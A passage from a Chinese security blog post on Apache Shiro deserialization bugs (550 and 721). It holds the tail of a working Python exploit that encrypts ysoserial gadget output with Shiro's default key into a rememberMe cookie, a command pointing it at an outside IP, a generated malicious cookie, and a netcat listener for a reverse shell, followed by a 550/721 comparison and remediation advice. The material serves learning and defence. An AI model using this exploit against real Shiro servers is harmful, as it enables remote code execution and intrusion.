<span class="line"><span style="color:#393A34;--shiki-dark:#DBD7CAEE">    pad </span><span style="color:#999999;--shiki-dark:#666666">=</span><span style="color:#AB5959;--shiki-dark:#CB7676"> lambda</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE"> s</span><span style="color:#999999;--shiki-dark:#666666">:</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE"> s </span><span style="color:#AB5959;--shiki-dark:#CB7676">+</span><span style="color:#999999;--shiki-dark:#666666"> </span><span style="color:#2993a3;--shiki-dark:#5eaab5">(</span><span style="color:#998418;--shiki-dark:#B8A965">bytes</span><span style="color:#1e754f;--shiki-dark:#4d9375">(</span><span style="color:#a65e2b;--shiki-dark:#d4976c">[</span><span style="color:#A65E2B;--shiki-dark:#C99076">BS</span><span style="color:#AB5959;--shiki-dark:#CB7676"> -</span><span style="color:#998418;--shiki-dark:#B8A965"> len</span><span style="color:#a13865;--shiki-dark:#d9739f">(</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE">s</span><span style="color:#a13865;--shiki-dark:#d9739f">)</span><span style="color:#AB5959;--shiki-dark:#CB7676"> %</span><span style="color:#A65E2B;--shiki-dark:#C99076"> BS</span><span style="color:#a65e2b;--shiki-dark:#d4976c">]</span><span style="color:#1e754f;--shiki-dark:#4d9375">)</span><span style="color:#2993a3;--shiki-dark:#5eaab5">)</span><span style="color:#AB5959;--shiki-dark:#CB7676"> *</span><span style="color:#999999;--shiki-dark:#666666"> </span><span style="color:#2993a3;--shiki-dark:#5eaab5">(</span><span style="color:#A65E2B;--shiki-dark:#C99076">BS</span><span style="color:#AB5959;--shiki-dark:#CB7676"> -</span><span style="color:#998418;--shiki-dark:#B8A965"> len</span><span style="color:#1e754f;--shiki-dark:#4d9375">(</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE">s</span><span style="color:#1e754f;--shiki-dark:#4d9375">)</span><span style="color:#AB5959;--shiki-dark:#CB7676"> %</span><span style="color:#A65E2B;--shiki-dark:#C99076"> BS</span><span style="color:#2993a3;--shiki-dark:#5eaab5">)</span></span>
<span class="line"></span>
<span class="line"><span style="color:#A0ADA0;--shiki-dark:#758575DD">    # 3. 准备密钥</span></span>
<span class="line"><span style="color:#393A34;--shiki-dark:#DBD7CAEE">    key </span><span style="color:#999999;--shiki-dark:#666666">=</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE"> base64</span><span style="color:#999999;--shiki-dark:#666666">.</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE">b64decode</span><span style="color:#2993a3;--shiki-dark:#5eaab5">(</span><span style="color:#B5695977;--shiki-dark:#C98A7D77">"</span><span style="color:#B56959;--shiki-dark:#C98A7D">kPH+bIxk5D2deZiIxcaaaA==</span><span style="color:#B5695977;--shiki-dark:#C98A7D77">"</span><span style="color:#2993a3;--shiki-dark:#5eaab5">)</span></span>
<span class="line"></span>
<span class="line"><span style="color:#A0ADA0;--shiki-dark:#758575DD">    # 4. 生成随机 IV</span></span>
<span class="line"><span style="color:#393A34;--shiki-dark:#DBD7CAEE">    iv </span><span style="color:#999999;--shiki-dark:#666666">=</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE"> uuid</span><span style="color:#999999;--shiki-dark:#666666">.</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE">uuid4</span><span style="color:#2993a3;--shiki-dark:#5eaab5">(</span><span style="color:#2993a3;--shiki-dark:#5eaab5">)</span><span style="color:#999999;--shiki-dark:#666666">.</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE">bytes</span></span>
<span class="line"></span>
<span class="line"><span style="color:#A0ADA0;--shiki-dark:#758575DD">    # 5. 创建 AES 加密器</span></span>
<span class="line"><span style="color:#393A34;--shiki-dark:#DBD7CAEE">    encryptor </span><span style="color:#999999;--shiki-dark:#666666">=</span><span style="color:#A65E2B;--shiki-dark:#C99076"> AES</span><span style="color:#999999;--shiki-dark:#666666">.</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE">new</span><span style="color:#2993a3;--shiki-dark:#5eaab5">(</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE">key</span><span style="color:#999999;--shiki-dark:#666666">,</span><span style="color:#A65E2B;--shiki-dark:#C99076"> AES</span><span style="color:#999999;--shiki-dark:#666666">.</span><span style="color:#A65E2B;--shiki-dark:#C99076">MODE_CBC</span><span style="color:#999999;--shiki-dark:#666666">,</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE"> iv</span><span style="color:#2993a3;--shiki-dark:#5eaab5">)</span></span>
<span class="line"></span>
<span class="line"><span style="color:#A0ADA0;--shiki-dark:#758575DD">    # 6. 读取 ysoserial 的输出并进行填充</span></span>
<span class="line"><span style="color:#393A34;--shiki-dark:#DBD7CAEE">    file_body </span><span style="color:#999999;--shiki-dark:#666666">=</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE"> pad</span><span style="color:#2993a3;--shiki-dark:#5eaab5">(</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE">popen</span><span style="color:#999999;--shiki-dark:#666666">.</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE">stdout</span><span style="color:#999999;--shiki-dark:#666666">.</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE">read</span><span style="color:#1e754f;--shiki-dark:#4d9375">(</span><span style="color:#1e754f;--shiki-dark:#4d9375">)</span><span style="color:#2993a3;--shiki-dark:#5eaab5">)</span></span>
<span class="line"></span>
<span class="line"><span style="color:#A0ADA0;--shiki-dark:#758575DD">    # 7. 加密并拼接 IV + 密文，最后 Base64 编码</span></span>
<span class="line"><span style="color:#A0ADA0;--shiki-dark:#758575DD">    # 修改点：encrypt 返回的是 bytes，直接 encode 即可</span></span>
<span class="line"><span style="color:#393A34;--shiki-dark:#DBD7CAEE">    base64_ciphertext </span><span style="color:#999999;--shiki-dark:#666666">=</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE"> base64</span><span style="color:#999999;--shiki-dark:#666666">.</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE">b64encode</span><span style="color:#2993a3;--shiki-dark:#5eaab5">(</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE">iv </span><span style="color:#AB5959;--shiki-dark:#CB7676">+</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE"> encryptor</span><span style="color:#999999;--shiki-dark:#666666">.</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE">encrypt</span><span style="color:#1e754f;--shiki-dark:#4d9375">(</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE">file_body</span><span style="color:#1e754f;--shiki-dark:#4d9375">)</span><span style="color:#2993a3;--shiki-dark:#5eaab5">)</span></span>
<span class="line"></span>
<span class="line"><span style="color:#1E754F;--shiki-dark:#4D9375">    return</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE"> base64_ciphertext</span></span>
<span class="line"></span>
<span class="line"></span>
<span class="line"><span style="color:#1E754F;--shiki-dark:#4D9375">if</span><span style="color:#998418;--shiki-dark:#B8A965"> __name__</span><span style="color:#AB5959;--shiki-dark:#CB7676"> ==</span><span style="color:#B5695977;--shiki-dark:#C98A7D77"> '</span><span style="color:#B56959;--shiki-dark:#C98A7D">__main__</span><span style="color:#B5695977;--shiki-dark:#C98A7D77">'</span><span style="color:#999999;--shiki-dark:#666666">:</span></span>
<span class="line"><span style="color:#A0ADA0;--shiki-dark:#758575DD">    # 检查参数</span></span>
<span class="line"><span style="color:#1E754F;--shiki-dark:#4D9375">    if</span><span style="color:#998418;--shiki-dark:#B8A965"> len</span><span style="color:#2993a3;--shiki-dark:#5eaab5">(</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE">sys</span><span style="color:#999999;--shiki-dark:#666666">.</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE">argv</span><span style="color:#2993a3;--shiki-dark:#5eaab5">)</span><span style="color:#AB5959;--shiki-dark:#CB7676"> </span><span style="color:#AB5959;--shiki-dark:#CB7676">&#x3C;</span><span style="color:#2F798A;--shiki-dark:#4C9A91"> 2</span><span style="color:#999999;--shiki-dark:#666666">:</span></span>
<span class="line"><span style="color:#998418;--shiki-dark:#B8A965">        print</span><span style="color:#2993a3;--shiki-dark:#5eaab5">(</span><span style="color:#B5695977;--shiki-dark:#C98A7D77">"</span><span style="color:#B56959;--shiki-dark:#C98A7D">Usage: python3 shiro_exp.py &#x3C;command></span><span style="color:#B5695977;--shiki-dark:#C98A7D77">"</span><span style="color:#2993a3;--shiki-dark:#5eaab5">)</span></span>
<span class="line"><span style="color:#393A34;--shiki-dark:#DBD7CAEE">        sys</span><span style="color:#999999;--shiki-dark:#666666">.</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE">exit</span><span style="color:#2993a3;--shiki-dark:#5eaab5">(</span><span style="color:#2F798A;--shiki-dark:#4C9A91">1</span><span style="color:#2993a3;--shiki-dark:#5eaab5">)</span></span>
<span class="line"></span>
<span class="line"><span style="color:#393A34;--shiki-dark:#DBD7CAEE">    payload </span><span style="color:#999999;--shiki-dark:#666666">=</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE"> encode_rememberme</span><span style="color:#2993a3;--shiki-dark:#5eaab5">(</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE">sys</span><span style="color:#999999;--shiki-dark:#666666">.</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE">argv</span><span style="color:#1e754f;--shiki-dark:#4d9375">[</span><span style="color:#2F798A;--shiki-dark:#4C9A91">1</span><span style="color:#1e754f;--shiki-dark:#4d9375">]</span><span style="color:#2993a3;--shiki-dark:#5eaab5">)</span></span>
<span class="line"><span style="color:#A0ADA0;--shiki-dark:#758575DD">    # 修改点：Python 3 的 print 是函数</span></span>
<span class="line"><span style="color:#998418;--shiki-dark:#B8A965">    print</span><span style="color:#2993a3;--shiki-dark:#5eaab5">(</span><span style="color:#B5695977;--shiki-dark:#C98A7D77">"</span><span style="color:#B56959;--shiki-dark:#C98A7D">rememberMe=</span><span style="color:#A65E2B;--shiki-dark:#C99076">{0}</span><span style="color:#B5695977;--shiki-dark:#C98A7D77">"</span><span style="color:#999999;--shiki-dark:#666666">.</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE">format</span><span style="color:#1e754f;--shiki-dark:#4d9375">(</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE">payload</span><span style="color:#999999;--shiki-dark:#666666">.</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE">decode</span><span style="color:#a65e2b;--shiki-dark:#d4976c">(</span><span style="color:#a65e2b;--shiki-dark:#d4976c">)</span><span style="color:#1e754f;--shiki-dark:#4d9375">)</span><span style="color:#2993a3;--shiki-dark:#5eaab5">)</span></span></code></pre>
<p>由于库的版本和兼容性问题，这里推荐python3脚本</p>
<p>随后我们将该python脚本与ysoserial.jar放到同一目录下并执行</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-powershell"><span class="line"><span style="color:#393A34;--shiki-dark:#DBD7CAEE">python3 demo6.py </span><span style="color:#2F798A;--shiki-dark:#4C9A91">111.228</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE">.</span><span style="color:#2F798A;--shiki-dark:#4C9A91">63.223</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE">:</span><span style="color:#2F798A;--shiki-dark:#4C9A91">9999</span></span></code></pre>
<p><img loading="lazy" src="1775045582860.png" alt="1775045582860" /></p>
<p>生成Cookie即</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-latex"><span class="line"><span style="color:#393A34;--shiki-dark:#DBD7CAEE">rememberMe=ggNmw3KFQkqJqQ67Zsr5PR/+vFUJIpINpC/73GtvS4knj4Ni+NCWe5kiJHF8qgzRTLNxD7HXm+S0aWyTtglxGFYiLvFR8qvb7IBeRMxj2TuEqMUWuQh4vkISNtxDte2s2XU6gCk7miel0hXNJ9pc8ZvFkzhloUlsoAD0W8Ganwy1bOImWIn7L9kiBChURvC69DJzFYnB5ceYZ9kDC3y2JxLS69ZyIv1lkTisLzEH7usuaw0a+Km7iSydyL0oz45e7mePhgj5nq7wtK+jDiJsGl9A3fvAfousXZpnqPdFFv8Zqxb1cT+8aiIUY1GfekkPVlgkGAV3St+lHPkRQK3JOJ7Kl8N43uVV5lNV6ZU+xNVt+AVrP5HBHmZeh3ZfeNtrkrO45Ivc8+S75vtQ6GxdIg==</span></span></code></pre>
<p>4、发送恶意请求</p>
<p>我们使用Burpsuit，构造Cookie，同时打开监听</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-latex"><span class="line"><span style="color:#393A34;--shiki-dark:#DBD7CAEE">nc -lvnp 9998</span></span></code></pre>
<p><img loading="lazy" src="1775045601512.png" alt="1775045601512" /><img loading="lazy" src="1775045614566.png" alt="1775045614566" /></p>
<p>成功实现反弹shell</p>
<h1 id="shiro-721"><a class="anchor" href="#shiro-721">#</a> shiro 721</h1>
<p>我们简单来讲一下shiro 721  影响范围Apache Shiro &lt; 1.4.2</p>
<p>Shiro组件的加密key是系统随机产生的，无法猜到key。但是安全专家很快发现，Shiro的加密方式是AES-128-CBC，CBC加密方式存在一个 Padding Oracle Attack漏洞，可以得到一个存在反序列化数据的AES加密密文，发送给服务端后，shiro组件会解密然后触发反序列化代码执行漏洞。这种攻击方式的前提是需要登录后台获取一个合法Cookie。</p>
<p>由于攻击复现利用难度太大，并且实战受环境影响其实很难实现。所以此处直接照搬了大佬们的<a target="_blank" rel="noopener" href="https://cloud.tencent.cn/developer/article/2037508?from=15425">复现帖子</a></p>
<p>并且文中也写出，shiro 721 在实战中实现的可能性很低</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-latex"><span class="line"><span style="color:#393A34;--shiki-dark:#DBD7CAEE">一次成功的Shiro Padding Oracle需要一直向服务器不断发包，判断服务器返回，攻击时间通常需要几个小时。由于此漏洞利用起来耗时时间特别长，很容易被waf封禁，因此在真实的红队项目中，极少有此漏洞的攻击成功案例，大家多数都是在虚拟机环境下测试。</span></span>
<span class="line"></span></code></pre>
<h1 id="shiro-550-和shiro-721-的异同"><a class="anchor" href="#shiro-550-和shiro-721-的异同">#</a> shiro 550 和shiro 721 的异同</h1>
<p>那我们来对比一下shiro 550 和shiro 721 的异同</p>
<p>最主要的区别:</p>
<p>1、这两个漏洞主要区别在于Shiro550使用已知密钥碰撞，只要有足够密钥库（条件较低），不需要Remember Cookie</p>
<p>2、Shiro721的ase加密的key基本猜不到，系统随机生成，可使用登录后rememberMe去爆破正确的key值，即利用有效的RememberMe Cookie作为Padding Oracle Attack的前缀，然后精心构造 RememberMe Cookie 值来实现反序列化漏洞攻击，难度高</p>
<table>
<thead>
<tr>
<th></th>
<th>shiro 550</th>
<th>shiro 721</th>
</tr>
</thead>
<tbody>
<tr>
<td>识别特征</td>
<td>识别特征都是响应包中的Set-Cookie: rememberMe=deleteMe;</td>
<td>识别特征都是响应包中的Set-Cookie: rememberMe=deleteMe;</td>
</tr>
<tr>
<td>利用难度</td>
<td>低。无需任何账号，只要框架使用了默认的硬编码密钥即可直接攻击</td>
<td>高。必须事先获取一个任意合法用户的 <code>rememberMe</code> Cookie，在此合法用户Cookie后再拼接我们反序列化的恶意poc</td>
</tr>
<tr>
<td>攻击速度</td>
<td>快。一旦拿到密钥，生成恶意Cookie并发送是秒级的事。</td>
<td>极慢。核心是利用了复杂的 Padding Oracle Attack，通常需要持续数小时甚至更久才能成功构造出恶意的Cookie</td>
</tr>
<tr>
<td>稳定性</td>
<td>高。攻击过程简单直接，不易出错。</td>
<td>低。长达数小时的发包过程极易因网络超时、IP被封、WAF拦截等因素中断，需要攻击者不断调整策略</td>
</tr>
</tbody>
</table>
<h1 id="修复建议"><a class="anchor" href="#修复建议">#</a> 修复建议：</h1>
<p>1、升级shiro版本</p>
<p>从 1.4.2 版本开始，Shiro默认的加密方式从存在风险的 <code>AES-CBC</code> 变更为更安全的 <code>AES-GCM</code> 模式。<code>AES-GCM</code> 是一种认证加密模式，能有效抵御Padding Oracle Attack，从根本上修复了此漏洞。</p>
<p>2、管理好密钥，不要使用默认密钥</p>
<p>3、升级jdk版本</p>
<p>将JDK升级到较新版本（如 8u191/7u201/6u211/11.0.1以上），可以限制反序列化漏洞被利用后的影响范围</p>
<p>4、网络层面的防护</p>
<p>上一些网络层面的防护，如waf 防火墙等</p>
<ul>
<li>拦截<code>Cookie</code>中<code>rememberMe</code>值长度过大的请求（这往往是攻击特征）。</li>
<li>对短时间内频繁请求同一URL的IP进行临时封禁，因为Shiro-721的利用过程会产生大量请求</li>
</ul>
<p>5、如果业务允许也可以直接关闭remember功能</p>
<div class="tags"><a href="/tags/Java%E5%AE%89%E5%85%A8/" rel="tag"><i class="ic i-tag"></i>Java安全</a></div></div><footer><div class="meta"><span class="item"><span class="icon"><i class="ic i-eye"></i></span><span class="text">总访问量：</span><span class="waline-pageview-count" id="twikoo_visitors" data-path="/2026/03/30/Java安全之Shiro/">加载中...</span></span><span class="item"><span class="icon"><i class="ic i-calendar-check"></i></span><span class="text">更新于 </span><time title="修改时间：2026-04-01 20:15:07" itemprop="dateModified" datetime="2026-04-01T20:15:07+08:00">2026-04-01</time></span></div><div id="copyright"><ul><li class="author"><strong>本文作者：</strong>Lib0gus的小屋<i class="ic i-at"><em>@</em></i>朝闻道 夕死可矣</li><li class="link"><strong>本文链接：</strong><a href="https://lib0gus.github.io/2026/03/30/Java%E5%AE%89%E5%85%A8%E4%B9%8BShiro/" title="Java安全之Shiro">https://lib0gus.github.io/2026/03/30/Java安全之Shiro/</a></li><li class="license"><strong>版权声明：</strong>本站所有文章除特别声明外，均采用 <a target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh"><i class="ic i-creative-commons"><em>(CC)</em></i>BY-NC-SA</a> 许可协议。转载请注明出处！</li></ul></div></footer></article></div><div class="post-nav"><div class="item left"><a href="/2026/03/29/Java%E5%AE%89%E5%85%A8%E4%B9%8BFastjson/" rel="prev" itemprop="url" title="Java安全之Fastjson" style="background-image: linear-gradient(to bottom right, #fc8fea, #89ccc9);"><span class="type">上一篇</span><span class="category"><i class="ic i-flag"></i>Java安全</span><h3>Java安全之Fastjson</h3></a></div><div class="item right"><a href="/2026/04/01/%E8%A7%A3%E5%86%B3hexo%E5%8D%9A%E5%AE%A2%E5%9B%BE%E7%89%87%E6%98%BE%E7%A4%BA%E9%97%AE%E9%A2%98/" rel="next" itemprop="url" title="解决hexo博客图片显示问题" style="background-image: linear-gradient(to bottom right, #a3a683, #accaba);"><span class="type">下一篇</span><h3>解决hexo博客图片显示问题</h3></a></div></div><div class="wrap" id="comments"></div></div><div id="sidebar"><div class="inner"><div class="panels"><div class="inner"><div class="contents panel pjax" data-title="文章目录"><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#shiro%E6%98%AF%E4%BB%80%E4%B9%88"><span class="toc-number">1.</span> <span class="toc-text"> Shiro是什么</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#shiro-550-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E5%8E%9F%E7%90%86"><span class="toc-number">2.</span> <span class="toc-text"> Shiro 550 反序列化漏洞原理</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%8E%9F%E7%90%86"><span class="toc-number">2.1.</span> <span class="toc-text"> 原理</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0"><span class="toc-number">2.2.</span> <span class="toc-text"> 漏洞复现</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%94%BB%E5%87%BB%E6%B5%81%E7%A8%8B%E4%B8%BA"><span class="toc-number">2.3.</span> <span class="toc-text"> 攻击流程为</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#shiro-721"><span class="toc-number">3.</span> <span class="toc-text"> shiro 721</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#shiro-550-%E5%92%8Cshiro-721-%E7%9A%84%E5%BC%82%E5%90%8C"><span class="toc-number">4.</span> <span class="toc-text"> shiro 550 和shiro 721 的异同</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E4%BF%AE%E5%A4%8D%E5%BB%BA%E8%AE%AE"><span class="toc-number">5.</span> <span class="toc-text"> 修复建议：</span></a></li></ol></div><div class="related panel pjax" data-title="系列文章"><ul><li ><a href="/2026/03/29/Java%E5%AE%89%E5%85%A8%E4%B9%8BFastjson/" rel="bookmark" title="Java安全之Fastjson">Java安全之Fastjson</a></li><li  class="active"><a href="/2026/03/30/Java%E5%AE%89%E5%85%A8%E4%B9%8BShiro/" rel="bookmark" title="Java安全之Shiro">Java安全之Shiro</a></li></ul></div><div class="overview panel" data-title="站点概览"><div class="author" itemprop="author" itemscope="itemscope" itemtype="http://schema.org/Person"><img class="image" loading="lazy" decoding="async" itemprop="image" alt="Lib0gus的小屋" src="/assets/test.png"/><p class="name" itemprop="name">Lib0gus的小屋</p><div class="description" itemprop="description">记录学习日常，请犀利点评，指出我的错误</div></div><nav class="state"><div class="item posts"><a href="/archives/"><span class="count">10</span><span class="name">文章</span></a></div><div class="item categories"><a href="/categories/"><span class="count">3</span><span class="name">分类</span></a></div><div class="item tags"><a href="/tags/"><span class="count">6</span><span class="name">标签</span></a></div></nav><div class="social"><a target="_blank" rel="noopener" href="https://github.com/Lib0gus" class="item github" title="https:&#x2F;&#x2F;github.com&#x2F;Lib0gus"><i class="ic i-github"></i></a></div><div class="menu"><li class="item"><a href="/" rel="section"><i class="ic i-home"></i>首页</a></li><li class="item"><a href="/categories/" rel="section"><i class="ic i-th"></i>分类</a></li><li class="item"><a href="/tags/" rel="section"><i class="ic i-tags"></i>标签</a></li><li class="item"><a href="/archives/" rel="section"><i class="ic i-list-alt"></i>归档</a></li></div></div></div></div><ul id="quick"><li class="prev pjax"><a href="/2026/04/01/%E8%A7%A3%E5%86%B3hexo%E5%8D%9A%E5%AE%A2%E5%9B%BE%E7%89%87%E6%98%BE%E7%A4%BA%E9%97%AE%E9%A2%98/" rel="prev" title="上一篇"><i class="ic i-chevron-left"></i></a></li><li class="up"><i class="ic i-arrow-up"></i></li><li class="down"><i class="ic i-arrow-down"></i></li><li class="next pjax"><a href="/2026/03/29/Java%E5%AE%89%E5%85%A8%E4%B9%8BFastjson/" rel="next" title="下一篇"><i class="ic i-chevron-right"></i></a></li><li class="percent"></li></ul></div></div><div class="dimmer"></div></div><div id="player"></div></main><footer id="footer"><div class="inner"><div class="widgets"><div class="rpost pjax"><h2>随机文章</h2><ul><li class="item"><div class="breadcrumb"><a href="/categories/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/" title="分类于代码审计">代码审计</a></div><span><a href="/2026/03/15/Java%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1%E4%B9%8Bsql%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E%EF%BC%88%E4%B8%80%EF%BC%89/">Java代码审计之sql注入漏洞（一）</a></span></li><li class="item"><div class="breadcrumb"><a href="/categories/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/" title="分类于代码审计">代码审计</a></div><span><a href="/2026/03/23/Java%E5%AE%89%E5%85%A8%E4%B9%8B%E5%8F%8D%E5%B0%84%E5%9F%BA%E7%A1%80%E7%9F%A5%E8%AF%86/">Java安全之反射基础知识</a></span></li><li class="item"><div class="breadcrumb"></div><span><a href="/2026/04/01/%E8%A7%A3%E5%86%B3hexo%E5%8D%9A%E5%AE%A2%E5%9B%BE%E7%89%87%E6%98%BE%E7%A4%BA%E9%97%AE%E9%A2%98/">解决hexo博客图片显示问题</a></span></li><li class="item"><div class="breadcrumb"><a href="/categories/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/" title="分类于代码审计">代码审计</a></div><span><a href="/2026/03/15/Java%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1%E4%B9%8Bsql%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E%EF%BC%88%E4%BA%8C%EF%BC%89/">Java代码审计之sql注入漏洞（二）</a></span></li><li class="item"><div class="breadcrumb"><a href="/categories/Java%E5%AE%89%E5%85%A8/" title="分类于Java安全">Java安全</a></div><span><a href="/2026/03/29/Java%E5%AE%89%E5%85%A8%E4%B9%8BFastjson/">Java安全之Fastjson</a></span></li><li class="item"><div class="breadcrumb"></div><span><a href="/2026/04/02/JNDI%E7%9A%84%E5%9F%BA%E7%A1%80%E7%9F%A5%E8%AF%86/">JNDI的基础知识</a></span></li><li class="item"><div class="breadcrumb"><a href="/categories/%E6%8A%80%E6%9C%AF%E9%9A%8F%E7%AC%94/" title="分类于技术随笔">技术随笔</a></div><span><a href="/2026/03/11/hello-world/">Hello World</a></span></li><li class="item"><div class="breadcrumb"></div><span><a href="/2026/04/06/%E5%B8%B8%E7%94%A8webshell%E5%B7%A5%E5%85%B7%E6%B5%81%E9%87%8F%E5%88%86%E6%9E%90/">常用webshell工具流量分析</a></span></li><li class="item"><div class="breadcrumb"><a href="/categories/Java%E5%AE%89%E5%85%A8/" title="分类于Java安全">Java安全</a></div><span><a href="/2026/03/30/Java%E5%AE%89%E5%85%A8%E4%B9%8BShiro/">Java安全之Shiro</a></span></li><li class="item"><div class="breadcrumb"></div><span><a href="/2026/04/01/Java%E5%AE%89%E5%85%A8%E4%B9%8BLog4j2/">Java安全之Log4j2</a></span></li></ul></div></div><div class="status"><div class="copyright">&copy; 2022 -<span itemprop="copyrightYear">2026</span><span class="with-love"><i class="ic i-sakura rotate"></i></span><span class="author" itemprop="copyrightHolder">Lib0gus的小屋 @ Lib0gus的博客</span></div><div class="count"><span class="post-meta-item-icon"><i class="ic i-chart-area"></i></span><span title="站点总字数">56k 字</span><span class="post-meta-divider"> | </span><span class="post-meta-item-icon"><i class="ic i-coffee"></i></span><span title="站点阅读时长">51 分钟</span></div><div class="powered-by">基于 <a target="_blank" rel="noopener" href="https://hexo.io/">Hexo</a> & Theme.<a target="_blank" rel="noopener" href="https://github.com/theme-shoka-x/hexo-theme-shokaX/">ShokaX</a></div></div></div></footer></div><script data-config type="text/javascript">var LOCAL = {
    ispost: true,
    path: `2026/03/30/Java安全之Shiro/`,
    favicon: {
        show: `（●´3｀●）やれやれだぜ`,
        hide: `(´Д｀)大変だ！`
    },
    search: {
        placeholder: "文章搜索",
        empty: "关于 「 ${query} 」，什么也没搜到",
        stats: "${time} ms 内找到 ${hits} 条结果"
    },
    nocopy: "false",
    copyright: `复制成功，转载请遵守 <i class="ic i-creative-commons"></i>BY-NC-SA 协议。`,
    copy_tex: false,
    katex: false,
    mermaid: false,
    audio: undefined,
    nocopy: false,
    outime: true,
    template: `<div class="note warning"><p><span class="label warning">文章时效性提示</span><br>这是一篇发布于 {{publish}} 天前，最后一次更新在 {{updated}} 天前的文章，部分信息可能已经发生改变，请注意甄别。</p></div>`,
    quiz: {
        choice: `单选题`,
        multiple: `多选题`,
        true_false: `判断题`,
        essay: `问答题`,
        gap_fill: `填空题`,
        mistake: `错题备注`
    }
};
</script><script>var _hmt = _hmt || [];
(function () {
    const hm = document.createElement("script");
    hm.src = "https://hm.baidu.com/hm.js?true"
    hm.async = true;
    const s = document.getElementsByTagName("script")[0];
    s.parentNode.insertBefore(hm, s);
 })();</script><script>(function(c,l,a,r,i,t,y){
    c[a]=c[a]||function(){(c[a].q=c[a].q||[]).push(arguments)};
    t=l.createElement(r);t.async=true;t.src="https://www.clarity.ms/tag/"+i;
    y=l.getElementsByTagName(r)[0];y.parentNode.insertBefore(t,y);
})(window, document, "clarity", "script", "true");</script><script async="async" src="https://www.googletagmanager.com/gtag/js?id=true"></script><script>window.dataLayer = window.dataLayer || [];
function gtag() {
    dataLayer.push(arguments);
}
gtag('js', new Date());
gtag('config', 'true');</script><script src="/js/siteInit.js?v=0.5.4" type="module" fetchpriority="high" defer></script></body></html>